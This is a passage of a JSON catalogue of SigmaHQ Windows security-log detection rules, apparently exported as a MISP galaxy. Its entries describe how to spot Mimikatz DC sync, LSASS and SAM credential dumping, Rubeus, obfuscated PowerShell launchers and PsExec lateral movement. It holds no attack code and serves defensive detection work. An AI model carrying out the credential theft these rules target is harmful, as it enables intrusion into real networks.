DLL Hijack - Security" }, { "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-09", "falsepositive": [ "Legitimate use of encrypted ZIP files" ], "filename": "win_security_susp_opened_encrypted_zip_filename.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" ], "tags": [ "attack.command-and-control", "attack.defense-evasion", "attack.t1027", "attack.t1105", "attack.t1036" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", "value": "Password Protected ZIP File Opened (Suspicious Filenames)" }, { "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_atsvc_task.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" ], "tags": [ "attack.lateral-movement", "attack.persistence", "car.2013-05-004", "car.2015-04-001", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "value": "Remote Task Creation via ATSVC Named Pipe" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_clip_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "value": "Invoke-Obfuscation CLIP+ Launcher - Security" }, { "description": "Detects potential use of Rubeus via registered new trusted logon process", "meta": { "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "win_security_register_new_logon_process_by_rubeus.yml", "level": "high", "logsource.category": "No established category", "logsource.product": 
"windows", "refs": [ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", "value": "Register new Logon Process by Rubeus" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" }, { "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as a covering detection for the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", "meta": { "author": "James Pemberton / @4A616D6573", "creation_date": "2019-10-31", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_local_anon_logon_created.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1189469425482829824", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" ], "tags": [ "attack.persistence", "attack.t1136.001", "attack.t1136.002" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" }, { "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", "meta": { "author": "xknow @xknow_infosec", "creation_date": "2019-03-24", "falsepositive": [ "Companies that may use these default LDAP attributes for personal information" ], "filename": "win_security_susp_ldap_dataexchange.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/fox-it/LDAPFragger", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" ], "tags": [ "attack.t1001.003", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "value": "Suspicious LDAP-Attributes Used" }, { "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-08-26", "falsepositive": [ "Unknown" ], "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" ], "tags": [ "attack.discovery", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", "value": "Azure AD Health Service Agents Registry Keys 
Access" }, { "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Transferring sensitive files for legitimate administration work by legitimate administrator" ], "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", "value": "Transferring Files with Credential Data via Network Shares" }, { "description": "Detects when a Windows Defender exclusion has been deleted. 
This could indicate an attacker trying to cover their tracks by removing previously added exclusions\n", "meta": { "author": "@BarryShooshooga", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "win_security_windows_defender_exclusions_write_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a33f8808-2812-4373-ae95-8cfb82134978", "value": "Windows Defender Exclusion Deleted" }, { "description": "The creation of a new domain trust is rare and should be verified for legitimacy.", "meta": { "author": "Thomas Patzke", "creation_date": "2019-12-03", "falsepositive": [ "Legitimate extension of domain structure" ], "filename": "win_security_susp_add_domain_trust.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", "value": "A New Trust Was Created To A Domain" }, { "description": "Detects well-known credential dumping tools 
execution via service execution events", "meta": { "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2017-03-05", "falsepositive": [ "Legitimate Administrator using credential dumping tool for password recovery" ], "filename": "win_security_mal_creddumper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "attack.t1003.006", "attack.t1569.002", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "value": "Credential Dumping Tools Service Execution - Security" }, { "description": "Detects the registration of the security event source VSSAudit. 
It would usually trigger when volume shadow copy operations happen.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-20", "falsepositive": [ "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." ], "filename": "win_security_vssaudit_secevent_source_registration.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "value": "VSSAudit Security Event Source Registration" }, { "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", "meta": { "author": "Bartlomiej Czyz, Relativity", "creation_date": "2021-01-21", "falsepositive": [ "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bczyz1.github.io/2021/01/30/psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1570", "attack.execution", 
"attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" }, { "description": "Detects the scenario where a user is assigned the SeEnableDelegationPrivilege right in Active Directory, which would allow control of other AD user objects.", "meta": { "author": "@neu5ron", "creation_date": "2017-07-30", "falsepositive": [ "Unknown" ], "filename": "win_security_alert_active_directory_user_control.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", "value": "Enabled User Right in AD to Control User Objects" }, { "description": "Detects Mimikatz DC sync security events", "meta": { "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "creation_date": "2018-06-03", "falsepositive": [ "Valid DC Sync that is not covered by the filters; please report", "Local Domain Admin account used for Azure AD Connect" ], "filename": 
"win_security_dcsync.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662", "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ "attack.credential-access", "attack.s0002", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "value": "Mimikatz DC Sync" }, { "description": "Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-14", "falsepositive": [ "Unknown" ], "filename": "win_security_mal_wceaux_dll.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.s0005" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", "value": "WCE wceaux.dll Access" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ 
"Unknown" ], "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" }, { "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event is generated by attackers scanning the network for Windows servers that accept Remote Desktop connections.\n", "meta": { "author": "Pushkarev Dmitry", "creation_date": "2020-06-27", "falsepositive": [ "Valid user who has not yet been added to the Remote Desktop Users group" ], "filename": "win_security_not_allowed_rdp_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"8e5c03fa-b7f0-11ea-b242-07e0576828d9", "value": "Denied Access To Remote Desktop" }, { "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", "meta": { "author": "sigma", "creation_date": "2017-02-12", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_lsass_dump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/jackcr/status/807385668833968128", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "value": "Password Dumper Activity on LSASS" }, { "description": "Detects handles requested to SAM registry hive", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-12", "falsepositive": [ "Unknown" ], "filename": "win_security_sam_registry_hive_handle_request.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" ], "tags": [ "attack.discovery", "attack.t1012", "attack.credential-access", "attack.t1552.002" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "value": "SAM Registry Hive Handle Request" }, { "description": "Detects access to ADMIN$ network share", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-04", "falsepositive": [ "Legitimate administrative activity" ], "filename": "win_security_admin_share_access.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", "value": "Access To ADMIN$ Network Share" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_var_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", "value": "Invoke-Obfuscation VAR+ Launcher - Security" }, { "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-12", "falsepositive": [ "Unknown" ], "filename": "win_security_syskey_registry_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" ], "tags": [ "attack.discovery", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "value": "SysKey Registry Keys Access" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "value": "Invoke-Obfuscation Via Use Clip - Security" }, { "description": "Detects backdooring of the domain object to grant the rights associated with DCSync to a regular user or machine account via the PowerView Add-DomainObjectAcl cmdlet with the DCSync extended right. This allows the account to re-obtain the password hashes of any user or computer.", "meta": { "author": "Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat", "creation_date": "2019-04-03", "falsepositive": [ "New Domain Controller computer account; check the user SIDs within the value attribute of event 5136 and verify whether it is a regular user or a DC computer account." ], "filename": "win_security_account_backdoor_dcsync_rights.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/menasec1/status/1111556090137903104", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" }, { "description": "Detects an installation of a device that is forbidden by the system policy", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_device_installation_blocked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" ], "tags": [ "attack.initial-access", "attack.t1200" ] }, "related": [ { "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", "value": "Device Installation Blocked" }, { "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_scheduled_task_delete_or_disable.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "value": "Important Scheduled Task Deleted/Disabled" }, { "description": 
